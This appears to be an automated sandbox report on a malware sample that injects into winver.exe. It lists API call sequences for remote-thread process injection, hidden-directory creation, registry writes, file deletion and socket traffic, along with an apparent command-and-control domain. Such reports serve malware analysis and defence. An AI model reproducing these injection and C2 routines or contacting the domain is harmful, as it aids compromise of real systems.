CloseHandle.KERNEL32(?,?,006D32D5,00000011,?,00000000,00A00000,00A00000,006D318E,00000004,00000000), ref: 006D3399

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
Instruction ID: 5fffa541b11b03ffed4ee0472e7389f5fff3e4fc0e2bdf99ea684dfe2e4b4e47
Opcode Fuzzy Hash: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
Instruction Fuzzy Hash: 8C118472C045649EDF52AB20CD45BDFB7FDEF50305F0144AAE985E6105DA349A80CE96

Function 006D26F1 Relevance: 6.0, APIs: 4, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 006D270C
GetFileSize.KERNEL32(?,00000000), ref: 006D2725
ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 006D2746
CloseHandle.KERNEL32(?), ref: 006D2757

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction ID: a2d815c58c0fe4babcfd56c13a18cf2c4c965670ca632ec4dface75d0fff65be
Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction Fuzzy Hash: A801EC30A40209FBEF259F50CC55B9DBAB5EF10B45F1041A5AA14F92E0D7709A259A54

Function 006D2764 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 006D2780
SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 006D279D
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 006D27B9
CloseHandle.KERNEL32(?), ref: 006D27CA

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction ID: 472c7d666bb7b8275a0c4896507439a39f14ac1ddb65ba1a0befee6a64054051
Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction Fuzzy Hash: 0101FB30A40209BFEF219FA0CC45F9D7EB5BF04B04F104169BA54BD1E1D770AA60AB54

Function 006D4002 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,006D3FF8,0000000A,?,00000000,0000000A), ref: 006D4022
Sleep.KERNEL32(000003E8,00000000,?,006D3FF8,0000000A,?,00000000,0000000A), ref: 006D4044
Sleep.KERNEL32(000007D0), ref: 006D4054
Sleep.KERNEL32(00000BB8), ref: 006D4064

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: Sleep$HandleModule
String ID:
API String ID: 3646095425-0
Opcode ID: 2260b28b3e21410e304e733389a9bb5d28d906a68a869efffc2975d072b34b11
Instruction ID: 9132a48924edee932d0dd1354bfb33608a445811093038bcad4131f5d62932e9
Opcode Fuzzy Hash: 2260b28b3e21410e304e733389a9bb5d28d906a68a869efffc2975d072b34b11
Instruction Fuzzy Hash: 1CF08C70C482509BEF907BB08C8A74836AA9F00305F00008ABB4ABE7D6CF7049D09E7B

Analysis Process: winver.exePID: 616, Parent PID: 364COMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.8%
Total number of Nodes:	455
Total number of Limit Nodes:	15

Executed Functions

Function 00D43084 Relevance: 6.1, APIs: 4, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(?,00000000,00000000,00000000), ref: 00D430F0
send.WS2_32(?,00000000,-00000004,00000000), ref: 00D43109
recv.WS2_32(?,00000000,00A00000,00000000), ref: 00D4312C
closesocket.WS2_32(?), ref: 00D43146

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: send$closesocketrecv
String ID:
API String ID: 3431254638-0
Opcode ID: 1986189e0edc64f25eeaa4ec4a6a448cde9b9c69e6188be43a80628219dae969
Instruction ID: fab05df0114f22f384e3aed83d4f84adcdb520d1973574f6a367add3bdd5cbdd
Opcode Fuzzy Hash: 1986189e0edc64f25eeaa4ec4a6a448cde9b9c69e6188be43a80628219dae969
Instruction Fuzzy Hash: C9216FB2B00624ABEF215E2CCC85F9A77A9EF44750F080194FE09EB255D735EE108B70

Function 00D40E21 Relevance: 6.1, APIs: 4, Instructions: 57
injectionmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(0000094C,00000000,00D459C8,00003000,00000040,?,?,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E47
WriteProcessMemory.KERNELBASE(0000094C,00D40000,00000000,00D459C8,00000000,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E65
IsWow64Process.KERNEL32(0000094C,?,?,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E7B
CreateRemoteThread.KERNELBASE(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D40EB1

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
String ID:
API String ID: 3578747408-0
Opcode ID: 079751ffdfe3eadcbe87efa349abbd0bf3a7fcc1013202ef83eaf6d3d040f129
Instruction ID: 37f297c871ea0ac7c90c1dcf6e8650f3e00624181e49fadc81aa7b85a54a19f9
Opcode Fuzzy Hash: 079751ffdfe3eadcbe87efa349abbd0bf3a7fcc1013202ef83eaf6d3d040f129
Instruction Fuzzy Hash: A3113D32100205BBFF109F15CC45F9A3B69EF80754F184461FE44BE595D771A561CAA8

Function 00D40688 Relevance: 19.6, APIs: 13, Instructions: 120
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00D4067F,00000009,?,00000000), ref: 00D4068D

Part of subcall function 00D40CDD: GetProcAddress.KERNEL32(00000000,00D42852), ref: 00D40CEA

Part of subcall function 00D406CE: lstrcat.KERNEL32(00000000,00D406C5), ref: 00D406DD
Part of subcall function 00D406CE: lstrcmpiA.KERNEL32(?,00000000), ref: 00D406F7
Part of subcall function 00D406CE: Sleep.KERNELBASE(00001388), ref: 00D4070A
Part of subcall function 00D406CE: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4072B
Part of subcall function 00D406CE: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D4073D
Part of subcall function 00D406CE: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4075E
Part of subcall function 00D406CE: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D40770
Part of subcall function 00D406CE: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D40791
Part of subcall function 00D406CE: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D407A3
Part of subcall function 00D406CE: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 00D407B7
Part of subcall function 00D406CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 00D407FE
Part of subcall function 00D406CE: Sleep.KERNELBASE(00001388), ref: 00D4081D

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
String ID:
API String ID: 3164464694-0
Opcode ID: dedc2d939db3d7c890df7c1040c66051942fd048389d53c1cef127f0e56e27d0
Instruction ID: 23f8c9bf8dfc605768cabdf3bdcbabf7114ac8dcaafdff28ee4e6e2c134a6c02
Opcode Fuzzy Hash: dedc2d939db3d7c890df7c1040c66051942fd048389d53c1cef127f0e56e27d0
Instruction Fuzzy Hash: 8E41F0B25042149FDB136B608C89FAA77BCEF44700F450599BB85EF056DE309690CEB5

Function 00D406CE Relevance: 18.1, APIs: 12, Instructions: 97
sleepstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(00000000,00D406C5), ref: 00D406DD
lstrcmpiA.KERNEL32(?,00000000), ref: 00D406F7
Sleep.KERNELBASE(00001388), ref: 00D4070A
CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4072B
SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D4073D
CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4075E
SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D40770
CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D40791
SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D407A3
VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 00D407B7
VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 00D407FE
Sleep.KERNELBASE(00001388), ref: 00D4081D

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
String ID:
API String ID: 2622802024-0
Opcode ID: 951468e210fe95408406a3f4a96b27f98f074e2fde19a294c948bda7aa55e254
Instruction ID: ad4a9426797cfd25ec6322903c334694b2ca701d1596d3b84cbc9ac9d193a6b8
Opcode Fuzzy Hash: 951468e210fe95408406a3f4a96b27f98f074e2fde19a294c948bda7aa55e254
Instruction Fuzzy Hash: CD3100B25002149FDF166BA08C89FAA77BCEF44B00F450499BB85FE055DE309680CEB5

Function 00D42BBB Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 185
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

inet_addr.WS2_32(008C03E8), ref: 00D42C01
gethostbyname.WS2_32(00000000), ref: 00D42C19
Sleep.KERNEL32(00002710), ref: 00D42C2C
gethostbyname.WS2_32(00000000), ref: 00D42C3C
gethostbyname.WS2_32(0000002E), ref: 00D42C99
gethostbyname.WS2_32(00000000), ref: 00D42CB4
gethostbyname.WS2_32(00000000), ref: 00D42CCF
gethostbyname.WS2_32(00000000), ref: 00D42CEA
Sleep.KERNELBASE(00000001,?,702F5000,00000020), ref: 00D42D40

Strings

lkebgoxdejyq.com, xrefs: 00D42BDE

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: gethostbyname$Sleep$inet_addr
String ID: lkebgoxdejyq.com
API String ID: 2568590207-2004641040
Opcode ID: a34b4da2268bc860f0f520e321a245857b8b4490be8b3e996429ce054df9c95d
Instruction ID: 29182fd8fffc853ec22e872201cef8e2d427b95695ff9f496af6a401a3e68879
Opcode Fuzzy Hash: a34b4da2268bc860f0f520e321a245857b8b4490be8b3e996429ce054df9c95d
Instruction Fuzzy Hash: 3851F472600604AFEF029F24C8C4BAA7BEDEF40701F894569FD4ADF04ADB749654CAB5

Function 00D42666 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsA.KERNEL32(00D42656,00000010,?,?,00000000,00000104), ref: 00D4266B
lstrcat.KERNEL32(00000000,00D426A3), ref: 00D426B0
lstrcat.KERNEL32(00000000,00000000), ref: 00D426C3

Strings

\AC\, xrefs: 00D42683

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: lstrcat$EnvironmentExpandStrings
String ID: \AC\
API String ID: 2903145849-1749977576
Opcode ID: 57d19e234318a21f2b0c89695377393bf8fdbed8659455edca517ce897c98d3c
Instruction ID: ca0b99d1dfb8c508e53eb2ad015c6bf34acbebf6ea5b563c7c5418d36dc1ebbb
Opcode Fuzzy Hash: 57d19e234318a21f2b0c89695377393bf8fdbed8659455edca517ce897c98d3c
Instruction Fuzzy Hash: D4217A71500249EFEF129F60CC49BADBBB4EF10704F6841A9F958EE1A2D7309A61DB64

Function 00D40D29 Relevance: 12.1, APIs: 8, Instructions: 64
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D40D48
Sleep.KERNELBASE(000003E8), ref: 00D40D5E
Process32First.KERNEL32(?,00000000), ref: 00D40D7E
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00D40DB3
FindCloseChangeNotification.KERNELBASE(00000000,0000094C,00000000), ref: 00D40DC9
Process32Next.KERNEL32(?,?), ref: 00D40DDF
FindCloseChangeNotification.KERNELBASE(?), ref: 00D40E0B
Sleep.KERNELBASE(000003E8), ref: 00D40E16

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: ChangeCloseFindNotificationProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1664173783-0
Opcode ID: 906d9b59944ca2996e4c0c1470c3d4f8f9543657b207ae87b4b0b306a21b53a3
Instruction ID: 1a795b71447d57073ef8fd41e4c4c55017daaa77c6465c5cffa8011a308ae38a
Opcode Fuzzy Hash: 906d9b59944ca2996e4c0c1470c3d4f8f9543657b207ae87b4b0b306a21b53a3
Instruction Fuzzy Hash: E4217F31901114ABEF225F64CC54AE9BBB9AF48700F0C01E9FA09FA195DB309E948F64

Function 00D42D95 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

inet_addr.WS2_32(008C03E8), ref: 00D42C01
gethostbyname.WS2_32(00000000), ref: 00D42C19
Sleep.KERNEL32(00002710), ref: 00D42C2C
gethostbyname.WS2_32(00000000), ref: 00D42C3C
gethostbyname.WS2_32(0000002E), ref: 00D42C99
gethostbyname.WS2_32(00000000), ref: 00D42CB4
gethostbyname.WS2_32(00000000), ref: 00D42CCF
gethostbyname.WS2_32(00000000), ref: 00D42CEA
Sleep.KERNELBASE(00000001,?,702F5000,00000020), ref: 00D42D40

Strings

lkebgoxdejyq.com, xrefs: 00D42BDE

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: gethostbyname$Sleep$inet_addr
String ID: lkebgoxdejyq.com
API String ID: 2568590207-2004641040
Opcode ID: 63afafa1fc27a11c37fc0038e10235930c01e3df49bc3c1b0ea1ecf0b60e05f1
Instruction ID: f0b8519a36a6e9e67c80e7aaf517f53824f21417eff083afe3716c6a5902210e
Opcode Fuzzy Hash: 63afafa1fc27a11c37fc0038e10235930c01e3df49bc3c1b0ea1ecf0b60e05f1
Instruction Fuzzy Hash: 1541C3715002059FEF129F20C8C4BBA7BA9EF44701F894199FC89EF04ADB749A55CBB4

Function 00D42A88 Relevance: 9.1, APIs: 6, Instructions: 108
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00D42A60

Part of subcall function 00D42BBB: inet_addr.WS2_32(008C03E8), ref: 00D42C01
Part of subcall function 00D42BBB: gethostbyname.WS2_32(00000000), ref: 00D42C19
Part of subcall function 00D42BBB: Sleep.KERNEL32(00002710), ref: 00D42C2C
Part of subcall function 00D42BBB: gethostbyname.WS2_32(00000000), ref: 00D42C3C
Part of subcall function 00D42BBB: gethostbyname.WS2_32(0000002E), ref: 00D42C99
Part of subcall function 00D42BBB: gethostbyname.WS2_32(00000000), ref: 00D42CB4
Part of subcall function 00D42BBB: gethostbyname.WS2_32(00000000), ref: 00D42CCF

gethostbyname.WS2_32(00D42A79), ref: 00D42A8D
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 00D42B02
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 00D42B46
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 00D42B9C
Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 00D42BB0

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: gethostbyname$DeleteFileSleep$inet_addr
String ID:
API String ID: 2694598323-0
Opcode ID: bae0c511f0b1c7365328c3a70ca679f768b9b1a1f437a03bbe7c44cbdd1b8e0b
Instruction ID: c358af0b3333f1b5b999e62024f6b270e8e21149e3b8d8f2be801d16fd14ac03
Opcode Fuzzy Hash: bae0c511f0b1c7365328c3a70ca679f768b9b1a1f437a03bbe7c44cbdd1b8e0b
Instruction Fuzzy Hash: D2312371500219AFEB226F71CC89FBB77BCEF90704F840599BA85EA055DE749680CEB1

Function 00D40B42 Relevance: 7.6, APIs: 5, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Process$Window$ExitFindLibraryLoadOpenThread
String ID:
API String ID: 3976292551-0
Opcode ID: ccaaf8e2c46dd3cf7be227d4414d85501149980c7dd8dcef856fa594b72e5a4d
Instruction ID: d12e67f7b011f159780ca402e21ff91a8bb6b9adb2ab648ae4fba4ceb4f39253
Opcode Fuzzy Hash: ccaaf8e2c46dd3cf7be227d4414d85501149980c7dd8dcef856fa594b72e5a4d
Instruction Fuzzy Hash: D711A5719443056BEB012AB08C89FAA3A5CDF00704F0D44A6BF45EF196DA70984187B9

Function 00D40B68 Relevance: 7.5, APIs: 5, Instructions: 43
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00D40B61,00000007,?,00000000), ref: 00D40B6D

Part of subcall function 00D40CDD: GetProcAddress.KERNEL32(00000000,00D42852), ref: 00D40CEA

Part of subcall function 00D40BA6: FindWindowA.USER32(00D40B98,0000000E), ref: 00D40BAB
Part of subcall function 00D40BA6: GetWindowThreadProcessId.USER32(00000000), ref: 00D40BB8
Part of subcall function 00D40BA6: OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 00D40BC5
Part of subcall function 00D40BA6: ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 00D40BE7

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Process$Window$AddressExitFindLibraryLoadOpenProcThread
String ID:
API String ID: 3081398214-0
Opcode ID: 0dd7f11518a3fcf72640f580a60b66e5f0517446295f17122682c526733adc48
Instruction ID: 824f95727845b0fd61b364bcb6fb23962abdeb7c1ce9586a670b700b67cbd19f
Opcode Fuzzy Hash: 0dd7f11518a3fcf72640f580a60b66e5f0517446295f17122682c526733adc48
Instruction Fuzzy Hash: C3018171A443457BEF112A708C89FAE3A5CEF00700F0D04A5BF45EE196DAB084418AB9

Function 00D40BA6 Relevance: 6.1, APIs: 4, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowA.USER32(00D40B98,0000000E), ref: 00D40BAB
GetWindowThreadProcessId.USER32(00000000), ref: 00D40BB8
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 00D40BC5

Part of subcall function 00D40E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,00D459C8,00003000,00000040,?,?,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E47
Part of subcall function 00D40E21: WriteProcessMemory.KERNELBASE(0000094C,00D40000,00000000,00D459C8,00000000,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E65
Part of subcall function 00D40E21: IsWow64Process.KERNEL32(0000094C,?,?,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E7B

ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 00D40BE7

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWow64Write
String ID:
API String ID: 1790362231-0
Opcode ID: 0767fc97329c2b13fdc1e02381c328018a20f762073ca0b8be634015b2320ea5
Instruction ID: 4e7e51dfdf10cacf9a689a33423eed0a17f92e1d67a0f28a93328b94a9c466af
Opcode Fuzzy Hash: 0767fc97329c2b13fdc1e02381c328018a20f762073ca0b8be634015b2320ea5
Instruction Fuzzy Hash: A5110671609341AFEF112B708D89E6A3F69EF42700F1D41A5FA44DF0A3DA70C80297B9

Function 00D426CD Relevance: 6.0, APIs: 4, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,80000000,00000003,00000005,?,00000000), ref: 00D426E8
GetFileSize.KERNEL32(?,00000000), ref: 00D42701
ReadFile.KERNELBASE(?,?,FFFFFFFF,?,00000000), ref: 00D42722
CloseHandle.KERNEL32(?), ref: 00D42733

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction ID: a703aba4250fb2f352420883e290b52ac44f1bfcff6a6a39faf4436f6d72e641
Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction Fuzzy Hash: DA01E830640209BBEF119F60CC45B6DBAB8AF00B44F6441A9BA14F91E0D770AB61DA28

Function 00D42740 Relevance: 6.0, APIs: 4, Instructions: 39
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 00D4275C
SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 00D42779
WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 00D42795
CloseHandle.KERNEL32(?), ref: 00D427A6

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction ID: b53456cd21a433158561c9759daabc36f8b4c73cf039959e51d24bcc0ab8b640
Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction Fuzzy Hash: 8801F630640209BFEF119FA0DC45F9DBEB5BF04B14F6041A8BA14BD1E5D771AA20AB64

Function 00D42A1F Relevance: 6.0, APIs: 4, Instructions: 33
sleepmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(00000000,00D42A16), ref: 00D42A25
VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 00D42A39
WSAStartup.WS2_32(00000202,00000000), ref: 00D42A54
Sleep.KERNELBASE(00000064), ref: 00D42A60

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: AllocSleepStartupVirtuallstrcat
String ID:
API String ID: 434075115-0
Opcode ID: 5958a867a1279e4f59574b3d7822e65de73c963b2ca4c5d598a9c3848b79554c
Instruction ID: 7ae4f744377f2e23726d4c0ba34380a86bbb4c46451b122416d1296adf63ee7f
Opcode Fuzzy Hash: 5958a867a1279e4f59574b3d7822e65de73c963b2ca4c5d598a9c3848b79554c
Instruction Fuzzy Hash: A1F0B471240341AFFB129B708C4BF2A77ACAF10B41F540499BE86EE082DBB095108BB1

Function 00D4089D Relevance: 6.0, APIs: 4, Instructions: 18registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,00D4086F,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 00D408A5
lstrlen.KERNEL32(80000001), ref: 00D408AE
RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 00D408CC
RegCloseKey.KERNELBASE(?), ref: 00D408D8

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 6288cf35a735a01df777dfb5869a3cd585be459f445e9b7a2041f7a878f31867
Instruction ID: 76a70b2cdc5de8bd425ef75c92c28fa2f3aea26a5343456680e1940a5a89c8ae
Opcode Fuzzy Hash: 6288cf35a735a01df777dfb5869a3cd585be459f445e9b7a2041f7a878f31867
Instruction Fuzzy Hash: 13E092B2100118BFEF126F60DC89E997B75EF54305F0440A0FE4AAD075CBB19AA0DF68

Function 00D41386 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D413B3
VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D413C8
VirtualProtect.KERNELBASE(?,00000020,?,00D41434,?,?,?,?,?,?,?,?,00D4155C,00D41439,00000000,00D41439), ref: 00D4142F

Memory Dump Source

Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_winver.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 5589b397c1f085e33905c3e3e552f402f77e3bb4902445c719e85d3e5bf65903
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 79219D31A0025AAFDB11DF78C849B9DBBB5AF04710F098225F959AF2D1E770E810CBA4

